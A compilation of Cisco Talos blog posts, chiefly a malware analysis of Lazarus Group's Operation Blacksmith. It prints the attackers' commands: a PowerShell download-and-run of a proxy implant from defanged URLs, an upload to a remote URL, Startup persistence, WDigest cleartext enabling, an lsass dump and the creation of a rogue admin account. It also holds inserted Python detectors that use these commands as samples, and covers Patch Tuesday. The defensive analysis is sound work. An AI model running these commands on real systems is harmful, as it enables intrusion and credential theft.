Most prevalent malware files from Talos telemetry over the past week 

Video: Talos 2023 Year in Review highlights

11 December 2023 at 10:48

In this video, experts from across Cisco Talos came together to discuss the 2023 Talos Year in Review. We chat about what’s new, what’s stayed the same, and how the geopolitical environment has affected the threat landscape.

This video was recorded live on social media:

We also discussed Project PowerUp, the story of how Cisco helped to keep the lights on in Ukraine. Read the full story here.

Operation Blacksmith: Lazarus targets organizations worldwide using novel Telegram-based malware written in DLang

11 December 2023 at 13:50
  • Cisco Talos recently discovered a new campaign conducted by the Lazarus Group we’re calling “Operation Blacksmith,” employing at least three new DLang-based malware families, two of which are remote access trojans (RATs), where one of these uses Telegram bots and channels as a medium of command and control (C2) communications. We track this Telegram-based RAT as “NineRAT” and the non-Telegram-based RAT as “DLRAT.” We track the DLang-based downloader as “BottomLoader.”
  • Our latest findings indicate a definitive shift in the tactics of the North Korean APT group Lazarus Group. Over the past year and a half, Talos has disclosed three different remote access trojans (RATs) built using uncommon technologies in their development, like QtFramework, PowerBasic and, now, DLang.
  • Talos has observed an overlap between our findings in this campaign conducted by Lazarus including tactics, techniques and procedures (TTPs) consistent with the North Korean state-sponsored group Onyx Sleet (PLUTIONIUM), also known as the Andariel APT group. Andariel is widely considered to be an APT sub-group under the Lazarus umbrella. 
  • This campaign consists of continued opportunistic targeting of enterprises globally that publicly host and expose their vulnerable infrastructure to n-day vulnerability exploitation such as CVE-2021-44228 (Log4j). We have observed Lazarus target manufacturing, agricultural and physical security companies.

Lazarus Group’s Operation Blacksmith compromised the manufacturing, agriculture and physical security sectors

Operation Blacksmith involved the exploitation of CVE-2021-44228, also known as Log4Shell, and the use of a previously unknown DLang-based RAT utilizing Telegram as its C2 channel. We’re naming this malware family “NineRAT.” NineRAT was initially built around May 2022 and was first used in this campaign as early as March 2023, almost a year later, against a South American agricultural organization. We then saw NineRAT being used again around September 2023 against a European manufacturing entity. 

During our analysis, Talos found some overlap with the malicious attacks disclosed by Microsoft in October 2023 attributing the activity to Onyx Sleet, also known as PLUTIONIUM or Andariel. 

Talos agrees with other researchers’ assessment that the Lazarus APT is essentially an umbrella of sub-groups that support different objectives of North Korea in defense, politics, national security and research and development. Each sub-group operates its own campaigns and develops and deploys bespoke malware against their targets, not necessarily working in full coordination. Andariel is typically tasked with initial access, reconnaissance and establishing long-term access for espionage in support of North Korean government interests. In some cases, Andariel has also conducted ransomware attacks against healthcare organizations.

The current campaign, Operation Blacksmith, consists of similarities and overlaps in tooling and tactics observed in previous attacks conducted by the Andariel group within Lazarus.

A common artifact in this campaign was “HazyLoad,” a custom-made proxy tool previously only seen in the Microsoft report. Talos found HazyLoad targeting a European firm and an American subsidiary of a South Korean physical security and surveillance company as early as May 2023.

In addition to Hazyload, we discovered “NineRAT” and two more distinct malware families — both DLang-based — being used by Lazarus. This includes a RAT family we’re calling “DLRAT” and a downloader we call “BottomLoader” meant to download additional payloads such as HazyLoad on an infected endpoint.

The adoption of DLang in Lazarus’ malware — NineRAT, DLRAT and BottomLoader

NineRAT uses Telegram as its C2 channel for accepting commands, communicating their outputs and even for inbound and outbound file transfer. The use of Telegram by Lazarus is likely to evade network and host-based detection measures by employing a legitimate service as a channel of C2 communications.

NineRAT consists of three components: a dropper binary with the two other components embedded in it. The dropper writes the two components to disk and deletes itself. The first component is an instrumentor called nsIookup.exe (with a capital “I” instead of a lowercase “L”) that executes the second component and is used in the persistence mechanism. Modular infection chains such as these are frequently used by threat actors to achieve a multitude of objectives, from defense evasion to functional separation of components that can be upgraded or modified while avoiding noisy operations on an infected system.

The dropper will set up persistence for the first component using a BAT script. The persistence mechanism accepts a service name, the path to the first component and service creation parameters:

Service Creation command

sc create Aarsvc_XXXXXX binPath=c:\windows\system32\nsIookup.exe -k AarSvcGroup -p type=own start=auto DisplayName=Agent Activation Runtime_XXXXXX

(Note the use of a capital “i” instead of “L” in nslookup[.]exe.)
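A defender-side check for the persistence above, added here as an example and not code from the Talos post: it parses an `sc create` command line, folds look-alike characters (capital I for lowercase L, and a few others) in the service binary's name, and flags the service when the folded name collides with a genuine Windows binary but the spelling does not. The confusable map and the system-binary allow-list are this example's own assumptions.

```python
import re
from pathlib import PureWindowsPath

# Look-alike characters folded before comparison (capital I for lowercase l is the trick the
# NineRAT instrumentor uses). The map is an assumption of this example; extend it as needed.
CONFUSABLES = str.maketrans({"I": "l", "1": "l", "|": "l", "O": "o", "0": "o"})

# Constructed allow-list of genuine Windows binary names (lowercase). Not exhaustive.
KNOWN_SYSTEM_BINARIES = {"nslookup.exe", "svchost.exe", "lsass.exe", "explorer.exe", "csrss.exe"}

SC_CREATE = re.compile(r"\bsc(?:\.exe)?\s+create\s+(?P<name>\S+)\s+(?P<rest>.*)", re.IGNORECASE)
# sc accepts "binPath= value" (space after '=') as well as "binPath=value".
BINPATH = re.compile(r"binPath=\s*(?:\"(?P<quoted>[^\"]+)\"|(?P<bare>\S+))", re.IGNORECASE)


def normalize(name: str) -> str:
    """Fold look-alike characters so 'nsIookup.exe' and 'nslookup.exe' compare equal."""
    return name.translate(CONFUSABLES).lower()


def service_binary(command_line: str):
    """Return (service name, binary basename) from an 'sc create' command line, or None."""
    m = SC_CREATE.search(command_line)
    if not m:
        return None
    b = BINPATH.search(m.group("rest"))
    if not b:
        return None
    # A quoted binPath may carry arguments after the path; an unquoted one is a single token.
    path = b.group("quoted") or b.group("bare")
    return m.group("name"), PureWindowsPath(path).name


def check_service_command(command_line: str):
    """Flag a service whose binary name only looks like a Windows system binary."""
    parsed = service_binary(command_line)
    if parsed is None:
        return None
    service, exe = parsed
    if exe.lower() in KNOWN_SYSTEM_BINARIES:
        return None  # spelled exactly like the real binary; out of scope for this check
    folded = normalize(exe)
    if folded in KNOWN_SYSTEM_BINARIES:
        return {"service": service, "binary": exe, "impersonates": folded}
    return None


# The service-creation command from the post, with the look-alike binary name.
SAMPLE_MALICIOUS = (
    r"sc create Aarsvc_XXXXXX binPath=c:\windows\system32\nsIookup.exe -k AarSvcGroup -p "
    r"type=own start=auto DisplayName=Agent Activation Runtime_XXXXXX"
)
# Constructed benign service registration for comparison.
SAMPLE_BENIGN = r'sc create VendorAgent binPath= "C:\Program Files\Vendor\agent.exe" start=auto'

if __name__ == "__main__":
    for cmd in (SAMPLE_MALICIOUS, SAMPLE_BENIGN):
        print(check_service_command(cmd))
```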

The instrumentor binary contains a preconfigured path to the NineRAT malware which is used to execute the malware:

Instrumentor binary (first component) containing the path to NineRAT malware on disk.

With NineRAT activated, the malware becomes the primary method of interaction with the infected host. However, previously deployed backdoor mechanisms, such as the reverse proxy tool HazyLoad, remain in place. The multiple tools give overlapping backdoor entries to the Lazarus Group with redundancies in the event a tool is discovered, enabling highly persistent access. In previous intrusions such as the one disclosed by Talos in 2022, Lazarus relied heavily on the use of proxy tools as a means of continued access to issue commands and exfiltrate data.

The Telegram C2 channels used by the malware led to the discovery of a previously public Telegram bot, “[at]StudyJ001Bot,” that was leveraged by Lazarus in NineRAT. This bot is publicly illustrated along with its ID and communication URL in a Korean-language tutorial from 2020. Using a publicly accessible bot may lead to infrastructure hijacking, and likely having recognized that, Lazarus started using their own bots for NineRAT. Interestingly, switching over to their own Telegram C2 channels did not stop the use of older NineRAT samples that rely on the open channels: Andariel has continued to use them well into 2023, even though they first started work on NineRAT in 2022. NineRAT typically contains two API tokens for interacting with two different Telegram channels — one of these tokens is publicly listed.

NineRAT interacts with the Telegram channel using DLang-based libraries implemented to talk to Telegram’s APIs. Initially, the implant tests authentication using the getMe method. The implant can upload documents to Telegram using the sendDocument method/endpoint or download files via the getFile method. The malware accepts the following commands from its operator over Telegram:

Command        Capability
/info          Gather preliminary information about the infected system.
/setmtoken     Set a token value.
/setbtoken     Set a new Bot token.
/setinterval   Set time interval between malware polls to the Telegram channel.
/setsleep      Set a time period for which the malware should sleep/lie dormant.
/upgrade       Upgrade to a new version of the implant.
/exit          Exit execution of the malware.
/uninstall     Uninstall self from the endpoint.
/sendfile      Send a file to the C2 server from the infected endpoint.

NineRAT can also uninstall itself from the system using a BAT file.

Below are some of the commands run by NineRAT for reconnaissance:

Command: whoami
Intent: System Information Discovery [T1082]

Command: wmic os get osarchitecture
Intent: System Information Discovery [T1082]

Command: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
Intent: Software Discovery [T1518]

Pivoting off the NineRAT samples, we discovered two additional malware families written in DLang by Lazarus. One of these is simply a downloader we track as “BottomLoader” meant to download and execute the next stage payload from a remote host such as HazyLoad:

Strings and embedded payload URL in the DLang-based downloader, BottomLoader.

BottomLoader can download the next stage payload from a hardcoded remote URL via a PowerShell command:

powershell Invoke-webrequest -URI <URL> -outfile <file_location_on_system>

It can also upload files to the C2, again using PowerShell:

powershell (New-Object System.Net.WebClient).UploadFile('<file_path>','<remote_url>’)

BottomLoader can also create persistence for newer versions or completely new follow-up payloads by creating a “.URL” file in the Startup directory to run the PowerShell command to download the payload. The URL file is constructed using the following commands:

echo [InternetShortcut] > "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\NOTEPAD.url"
echo URL="" >> "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\NOTEPAD.url"
echo IconFile=C:\WINDOWS\system32\SHELL32.dll >> "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\NOTEPAD.url"
echo IconIndex=20 >> "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\NOTEPAD.url"
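An added example, not code from the Talos post or from BottomLoader, that parses a Startup-folder .url file in the layout the echo commands above produce and reports why it deserves review. The page elides the URL value, so the file:// target in the constructed variant is an assumption, as are the path and the extension list.

```python
import configparser
from pathlib import PureWindowsPath
from urllib.parse import urlsplit

# Extensions that should never be the target of a logon-time shortcut (this example's list).
SCRIPT_LIKE = {".ps1", ".exe", ".bat", ".cmd", ".vbs", ".js", ".hta", ".dll"}


def parse_internet_shortcut(text: str):
    """Parse the INI-style .url format; return the [InternetShortcut] keys or None."""
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",))
    cp.optionxform = str  # keep key case (URL, IconFile) as written
    try:
        cp.read_string(text)
    except configparser.Error:
        return None
    if "InternetShortcut" not in cp:
        return None
    return dict(cp["InternetShortcut"])


def assess_startup_shortcut(path: str, text: str):
    """Return the reasons a .url file in a Startup folder deserves review ([] = unremarkable)."""
    if "startup" not in [part.lower() for part in PureWindowsPath(path).parts]:
        return []  # only Startup-folder shortcuts run automatically at logon
    entry = parse_internet_shortcut(text)
    if entry is None:
        return ["not a parseable InternetShortcut file"]
    reasons = []
    url = entry.get("URL", "").strip().strip('"')
    if not url:
        reasons.append("empty URL")
    else:
        parts = urlsplit(url)
        if parts.scheme.lower() not in ("http", "https"):
            reasons.append(f"non-web scheme '{parts.scheme}'")
        if PureWindowsPath(parts.path).suffix.lower() in SCRIPT_LIKE:
            reasons.append("target is a script or executable")
    # Borrowing a system DLL icon makes the entry look built in; only meaningful alongside another hit.
    if reasons and entry.get("IconFile", "").lower().endswith("shell32.dll"):
        reasons.append("system icon borrowed from SHELL32.dll")
    return reasons


# Constructed location matching the %appdata% Startup path the echo commands write to.
STARTUP_PATH = r"C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NOTEPAD.url"

# Layout exactly as the echo commands above write it (URL value elided on the page).
PAGE_LAYOUT = '[InternetShortcut]\nURL=""\nIconFile=C:\\WINDOWS\\system32\\SHELL32.dll\nIconIndex=20\n'

# Constructed variant with a local script as the target; the file:// value is an assumption.
CONSTRUCTED_LOCAL = PAGE_LAYOUT.replace('URL=""', "URL=file:///C:/Users/Public/stage.ps1")

# Constructed benign shortcut a user might legitimately keep in Startup.
CONSTRUCTED_BENIGN = "[InternetShortcut]\nURL=https://intranet.example/dashboard\n"

if __name__ == "__main__":
    samples = (("page layout", PAGE_LAYOUT), ("local script", CONSTRUCTED_LOCAL), ("benign", CONSTRUCTED_BENIGN))
    for label, body in samples:
        print(label, assess_startup_shortcut(STARTUP_PATH, body))
```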

The other malware is a downloader and RAT, we track as “DLRAT,” which can be used to deploy additional malware and retrieve commands from the C2 and execute them on the infected endpoints:

DLRAT: A DLang-based RAT and downloader.

This malware contains hardcoded commands to perform system reconnaissance. It starts by executing the commands “ver”, “whoami” and “getmac” on the endpoint to gather preliminary information about the system. With this, the operators have the version of the operating system, the user running the malware and the MAC address, which allows them to identify the system on the network.

DLRAT code snippet consisting of preliminary data gathering capabilities.

Once the first initialization and beacon is performed, an initialization file is created, in the same directory, with the name “SynUnst.ini”.

After beaconing to the C2, the RAT will post, in a multipart format, the collected information and hardcoded session information.

During our analysis, we found that the session information ID used by DLRAT as part of its communications with its C2 server is “23wfow02rofw391ng23”, which is the same value that we found during our previous research into MagicRAT. In the case of MagicRAT, the value is encoded as an HTML post. But with DLRAT, it's being posted as multipart/form-data. This session information is hardcoded into the DLRAT malware as a base64-encoded string constructed on the process stack during runtime:

Hardcoded Session ID in DLRAT, the same as MagicRAT.
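As an added example, not code from the Talos post or from the DLRAT sample: a minimal multipart/form-data parser that inspects C2-bound POST bodies for the shared session ID, in plain and base64 form, which is the kind of content match a network sensor can apply to the beacon described above. The boundary, field names and recon values in the constructed body are assumptions.

```python
import base64
import re

# Session ID Talos observed in DLRAT traffic, shared with the earlier MagicRAT.
DLRAT_SESSION_ID = "23wfow02rofw391ng23"
# DLRAT stores the value base64-encoded, so look for that form in bodies as well.
SESSION_ID_B64 = base64.b64encode(DLRAT_SESSION_ID.encode()).decode()


def parse_multipart(body: bytes, content_type: str) -> dict:
    """Minimal multipart/form-data parser: {field name: raw value bytes}. For inspection only."""
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if not m:
        return {}
    delimiter = b"--" + m.group(1).encode()
    fields = {}
    for part in body.split(delimiter)[1:]:
        if part.strip() in (b"", b"--"):
            continue  # preamble remainder or the closing "--"
        headers, _, value = part.partition(b"\r\n\r\n")
        name = re.search(rb'name="([^"]+)"', headers)
        if name:
            fields[name.group(1).decode()] = value.rstrip(b"\r\n")
    return fields


def find_dlrat_session(body: bytes, content_type: str):
    """Return (field, encoding) where the DLRAT session ID appears, else None."""
    for field, value in parse_multipart(body, content_type).items():
        text = value.decode("utf-8", errors="replace")
        if DLRAT_SESSION_ID in text:
            return field, "plain"
        if SESSION_ID_B64 in text:
            return field, "base64"
    return None


# Constructed POST body in the shape described above: a session field plus the ver/whoami/getmac
# output. Boundary, field names and the recon values are assumptions of this example.
SAMPLE_CONTENT_TYPE = "multipart/form-data; boundary=----constructedBoundary42"
SAMPLE_BODY = (
    b"------constructedBoundary42\r\n"
    b'Content-Disposition: form-data; name="session"\r\n\r\n'
    b"23wfow02rofw391ng23\r\n"
    b"------constructedBoundary42\r\n"
    b'Content-Disposition: form-data; name="info"\r\n\r\n'
    b"Microsoft Windows [Version 10.0.19045]\r\nLAB\\user\r\n00-11-22-33-44-55\r\n"
    b"------constructedBoundary42--\r\n"
)
# Same shape with an unrelated session value (constructed), to show a non-match.
BENIGN_BODY = SAMPLE_BODY.replace(b"23wfow02rofw391ng23", b"sess-7f3a")

if __name__ == "__main__":
    print(find_dlrat_session(SAMPLE_BODY, SAMPLE_CONTENT_TYPE))
    print(find_dlrat_session(BENIGN_BODY, SAMPLE_CONTENT_TYPE))
```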

The C2 reply only contains the external IP address of the implant. The malware recognizes the following command codes/names sent by the C2 servers to execute corresponding actions on the infected system:

Command name   Capability
deleteme       Delete itself from the system using a BAT file.
download       Download files from a specified remote location.
rename         Rename files on the system.
iamsleep       Instructs the implant to go to sleep for a specified amount of time.
upload         Upload files to C2.
showurls       Empty command (not implemented yet).

Illustrating Operation Blacksmith

This particular attack observed by Talos involves the successful exploitation of CVE-2021-44228, also known as Log4Shell, on publicly facing VMware Horizon servers as the means of initial access. Preliminary reconnaissance follows the initial access, leading to the deployment of a custom-made implant on the infected system. 

Typical Infection chain observed in Operation Blacksmith.

Phase 1: Initial reconnaissance by Lazarus

Lazarus’s initial access begins with successful exploitation of CVE-2021-44228, the infamous Log4j vulnerability discovered in 2021. The vulnerability has been extensively exploited by the Lazarus umbrella of APT groups to deploy several pieces of malware and dual-use tools, and to conduct extensive hands-on-keyboard activity.

Command: cmd.exe /c whoami
Intent: System Information Discovery [T1082]

Command: cmd.exe /c wevtutil qe Microsoft-Windows-TerminalServices-LocalSessionManager/Operational /c:5 /q:*[System [(EventID=25)]] /rd:true /f:text
Intent: Query event logs: Get RDP session reconnection information

Command: net user
Intent: System Information Discovery [T1082]

Command: cmd.exe /c dir /a c:\users\
Intent: System Information Discovery [T1082]

Command: cmd.exe /c netstat -nap tcp
Intent: System Information Discovery [T1082]

Command: systeminfo
Intent: System Information Discovery [T1082]

Command: cmd.exe /c Reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\Wdigest
Intent: OS Credential Dumping [T1003/005]

Command: cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
Intent: OS Credential Dumping [T1003/005], Modify Registry [T1112]

Command: cmd.exe /c tasklist | findstr Secu
Intent: Software Discovery [T1518]

Once the initial reconnaissance has been completed, Lazarus’ operators deployed HazyLoad, a proxy tool used to establish direct access to the infected system without having to repeatedly exploit CVE-2021-44228.

Command: cmd[.]exe /c powershell[.]exe -ExecutionPolicy ByPass -WindowStyle Normal (New-Object System[.]Net[.]WebClient).DownloadFile('hxxp[://]/inet[.]txt', 'c:\windows\adfs\de\inetmgr[.]exe');
Action: Download and execute HazyLoad

Command: c:\windows\adfs\de\inetmgr[.]exe -i -p
Action: Execute HazyLoad reverse proxy

Command: cmd /C powershell Invoke-WebRequest hxxp[://]/down/bottom[.]gif -OutFile c:\windows\wininet64[.]exe
Command: cmd /C c:\windows\wininet64[.]exe -i -p 443
Action: Download and execute HazyLoad

In certain instances, the operators will also switch HazyLoad over to a new remote IP address. This is a common tactic attackers use to maintain continued access to previously compromised systems as their infrastructure evolves.

Command: cmd /C taskkill /IM wininet64[.]exe /F
Action: Stop original HazyLoad execution

Command: cmd /C c:\windows\wininet64[.]exe -i -p 443
Action: Relaunch HazyLoad with new parameters

The threat actors also created an additional user account on the system, granting it administrative privileges. Talos documented this TTP earlier this year, but the activity observed previously was meant to create unauthorized user accounts at the domain level. In this campaign, the operators created a local account, which matches the user account documented by Microsoft.

Command: cmd.exe /c net user krtbgt /add
Intent: Account Creation [T1136]

Command: cmd.exe /c net localgroup Administrators krtbgt /add
Intent: Account Creation [T1098]

Command: cmd.exe /c net localgroup Administrators
Intent: User Discovery [T1033]

Once the user account was successfully set up, the attackers switched over to it for their hands-on-keyboard activity, which constitutes a deviation from the pattern Cisco Talos previously documented. The hands-on-keyboard activity begins by downloading and using credential dumping utilities such as ProcDump and MimiKatz.

Command: procdump.exe -accepteula -ma lsass.exe lsass.dmp
Intent: Credential harvesting [T1003]

Command: pwdump.exe (Mimikatz)
Intent: Credential harvesting [T1003]
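Detection logic for the Phase 1 activity above, added here as an example rather than code from the Talos post: it runs regex rules over constructed command-line log lines and correlates a `net user /add` with a later `net localgroup Administrators /add` for the same account on the same host, so the pairing is reported rather than either routine command alone. The log format, host and user names and rule names are this example's assumptions; the technique labels are those in the tables.

```python
import re
from collections import defaultdict

# Constructed log format: "<timestamp> <host> <user> <command line>".
LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<host>\S+)\s+(?P<user>\S+)\s+(?P<cmd>.*)$")

# Single-command rules for the Phase 1 commands above; the regexes are this example's own,
# the technique labels are the ones listed in the tables.
RULES = [
    ("rdp_session_log_query",
     re.compile(r"wevtutil\s+qe\s+Microsoft-Windows-TerminalServices-LocalSessionManager", re.I),
     "Query event logs: Get RDP session reconnection information"),
    ("wdigest_policy_query",
     re.compile(r"\breg\s+query\s+\S*SecurityProviders\\WDigest\b", re.I),
     "OS Credential Dumping [T1003/005]"),
    ("wdigest_cleartext_enable",
     re.compile(r"\breg\s+add\s+\S*SecurityProviders\\WDigest\s+/v\s+UseLogonCredential\s+/t\s+REG_DWORD\s+/d\s+1\b", re.I),
     "OS Credential Dumping [T1003/005], Modify Registry [T1112]"),
    ("security_software_discovery",
     re.compile(r"tasklist\s*\|\s*findstr\s+Secu|SecurityCenter2.*AntiVirusProduct", re.I),
     "Software Discovery [T1518]"),
    ("lsass_dump_procdump",
     re.compile(r"procdump(?:64)?(?:\.exe)?\s+.*-ma\s+lsass(?:\.exe)?\b", re.I),
     "Credential harvesting [T1003]"),
]
NET_USER_ADD = re.compile(r"\bnet\s+user\s+(\S+)\s+/add\b", re.I)
NET_LOCALGROUP_ADMIN_ADD = re.compile(r"\bnet\s+localgroup\s+administrators\s+(\S+)\s+/add\b", re.I)


def analyze(lines):
    """Return (host, finding, technique) tuples in log order."""
    findings = []
    created = defaultdict(set)  # host -> accounts created with "net user <name> /add"
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        host, cmd = m["host"], m["cmd"]
        for name, pattern, technique in RULES:
            if pattern.search(cmd):
                findings.append((host, name, technique))
        u = NET_USER_ADD.search(cmd)
        if u:
            created[host].add(u.group(1).lower())
        g = NET_LOCALGROUP_ADMIN_ADD.search(cmd)
        # Only the pairing (create, then elevate on the same host) is reported.
        if g and g.group(1).lower() in created[host]:
            findings.append((host, "new_local_admin:" + g.group(1), "Account Creation [T1136], [T1098]"))
    return findings


# Constructed log lines carrying the commands from the tables above; timestamps, host and user
# names are made up. The last line shows a lone account creation that is not reported.
SAMPLE_LOG = r"""
2023-01-01T00:01:03Z HORIZON01 svc_horizon cmd.exe /c whoami
2023-01-01T00:01:05Z HORIZON01 svc_horizon cmd.exe /c wevtutil qe Microsoft-Windows-TerminalServices-LocalSessionManager/Operational /c:5 /q:*[System [(EventID=25)]] /rd:true /f:text
2023-01-01T00:01:09Z HORIZON01 svc_horizon cmd.exe /c Reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\Wdigest
2023-01-01T00:01:15Z HORIZON01 svc_horizon cmd.exe /c reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
2023-01-01T00:01:20Z HORIZON01 svc_horizon cmd.exe /c tasklist | findstr Secu
2023-01-01T00:02:30Z HORIZON01 svc_horizon cmd.exe /c net user krtbgt /add
2023-01-01T00:02:35Z HORIZON01 svc_horizon cmd.exe /c net localgroup Administrators krtbgt /add
2023-01-01T00:05:00Z HORIZON01 krtbgt procdump.exe -accepteula -ma lsass.exe lsass.dmp
2023-01-01T00:06:00Z FILESRV02 alice cmd.exe /c net user alice.backup /add
""".strip().splitlines()

if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(*finding, sep="  |  ")
```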

Phase 2: Lazarus deploys NineRAT

Once the credential dumping is complete, Lazarus deploys a previously unknown RAT we’re calling “NineRAT” on the infected systems. NineRAT was first seen being used in the wild by Lazarus as early as March 2023. NineRAT is written in DLang, and its use indicates a definitive shift in TTPs from APT groups under the Lazarus umbrella toward malware authored using non-traditional frameworks, following MagicRAT and QuiteRAT, which were built with the Qt framework.

Once NineRAT is activated, it accepts preliminary commands from the Telegram-based C2 channel, to again fingerprint the infected systems. Re-fingerprinting the infected systems indicates the data collected by Lazarus via NineRAT may be shared by other APT groups and essentially resides in a different repository from the fingerprint data collected initially by Lazarus during their initial access and implant deployment phase.

Commands typically executed by NineRAT include:

Command: cmd.exe /C ipconfig /all
Intent: System Information Discovery [T1082]

Command: cmd.exe /C ver
Intent: System Information Discovery [T1082]

Command: cmd.exe /C wmic os get osarchitecture
Intent: System Information Discovery [T1082]

Command: cmd.exe /C WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
Intent: Software Discovery [T1518]

Command: cmd.exe /C net group /domain Domain Computers
Intent: System Information Discovery [T1082]

Command: cmd.exe /C netstat -nap tcp
Intent: System Information Discovery [T1082]

Command: cmd.exe /C whoami
Intent: System Information Discovery [T1082]

Coverage

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

IOCs

IOCs for this research can also be found at our GitHub repository here.

Microsoft releases lightest Patch Tuesday in three years, no zero-days disclosed

12 December 2023 at 19:45

Microsoft’s monthly security update released Tuesday is the company’s lightest in four years, including only 33 vulnerabilities. 

Perhaps more notable is that there are no zero-day vulnerabilities included in December’s Patch Tuesday, a rarity for Microsoft this year. The company’s regular set of advisories has included a vulnerability that’s been actively exploited in the wild in 10 months this year.  

However, Microsoft released patches for four critical vulnerabilities, three of which could lead to remote code execution. The remainder of this month’s vulnerabilities are considered “important.” Thirty-three vulnerabilities is the lowest number included in a Patch Tuesday since December 2019.  

Two of the critical vulnerabilities are CVE-2023-35630 and CVE-2023-35641, which exist in the Internet Connection Sharing (ICS) service on certain versions of Windows 10, 11 and Windows Server. An attacker could exploit these vulnerabilities to execute code on the targeted machine by modifying the option->length field in a DHCPv6 DHCPV6_MESSAGE_INFORMATION_REQUEST input message. However, this attack is limited to systems connected to the same network segment as the attacker.

Another critical remote code execution vulnerability is CVE-2023-35628, which exists in the Windows MSHTML Platform. The MSHTML platform is used in different web browsers, including Microsoft Edge, and other web applications through its WebBrowser control.  

An adversary could exploit this vulnerability by sending a specially crafted email that triggers automatically when the Microsoft Outlook client retrieves and processes it. This means the vulnerability could be triggered before the user even opens the email in the Preview Pane. Alternatively, an attacker could also put a malicious hyperlink in an email and trick the user into clicking on the link.  

There are also a few vulnerabilities Microsoft considers “important” that Talos would like to highlight because of their specific attack vectors.   

There is an information disclosure vulnerability (CVE-2023-35636) in Microsoft Outlook that could lead to the leaking of NTLM hashes. Attackers commonly use NTLM hashes in follow-on attacks, such as pass-the-hash. An adversary could exploit this vulnerability by tricking the user into opening a specially crafted file, such as a lure document attached to a phishing email, or a file hosted on an attacker-controlled page they trick the user into opening in their web browser. 

Windows Media also contains a remote code execution vulnerability that can be triggered if the user opens a specially crafted file. CVE-2023-21740 is considered “low” complexity by Microsoft, and because it’s in Windows Media Player, a potential attack vector could be ripped movies, episodes of television shows or home videos that could serve as convincing lures for targets.  

A complete list of all the other vulnerabilities Microsoft disclosed this month is available on its update page.

In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Secure Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. 

The rules included in this release that protect against the exploitation of many of these vulnerabilities are 62762 - 62771, 62786 and 62787. There are also Snort 3 rules 300774, 300777, 300778, 300780, 300781, 300784 and 300787.

Recommendations that defenders can use from Talos’ Year in Review Report

14 December 2023 at 12:21

The Talos Year in Review is available now and contains a wealth of insights about how the threat landscape has shifted in 2023. With new ransomware strains emerging from leaked source code, commodity loaders adding more reconnaissance measures to their belts, and geopolitical events influencing APT activity, there’s a lot to dissect.

From a defender’s point of view, what does that mean heading into 2024? Do you need to consistently shift tactics too, to stay one threat ahead? 

The thing is, we will never be “done” with cybersecurity. There will always be new threat actor groups. New strains. New tactics. And even if the defender community dismantles a botnet, like for example the takedown of Qakbot in August, it doesn’t mean the group behind it will cease to operate. We’ll never reach that scenario in the game of Battleship when you’ve found the final target and smugly mutter, “This is your last boat.”

There are two ways of looking at that. You can either say, “What’s the point?” Or “We know we’ll probably get hit at some point. What can we do to ensure we eradicate the threat as quickly as possible?” So much of cybersecurity is about balancing and reducing risk: knowing what risks you can accept, and what risks you absolutely can’t.

That base visibility is key. As we at Talos commonly say, whoever knows the network best, owns the network.

For example, Veradigm, a healthcare IT organization that the Cisco Talos Incident Response (Talos IR) team has been working alongside for many years to proactively assess and constantly improve their security posture, recently detected an intrusion and potential information-stealing attack. Luckily, their preparedness coupled with their Talos IR partnership enabled them to swiftly pinpoint the issues before bad actors could execute their plan.

The key to Veradigm’s successful response? Visibility across the network, having a clear plan, and being able to answer these four questions as quickly as possible:

  • How did they get in?
  • Are they still in?
  • What did they do?
  • How could they get in again?

Veradigm has also participated in multiple Talos IR tabletop exercises to stress test processes and adjust as needed to respond and succeed more quickly.

Aligned to that, experts from across Cisco recently sat down to discuss proactive threat hunting in general, and the benefits this type of activity can have in helping organizations find vulnerabilities and weak points that hadn't been spotted before. Check out the discussion below:

One of the newer cross-regional trends we observed this year (and wrote about in the 2023 Year in Review) is an increase in the targeting of network devices, from both APTs and cybercriminals. The intent can differ between these disparate adversaries: the former is more driven by espionage and secondary target selection while the latter aims more for financial gain.

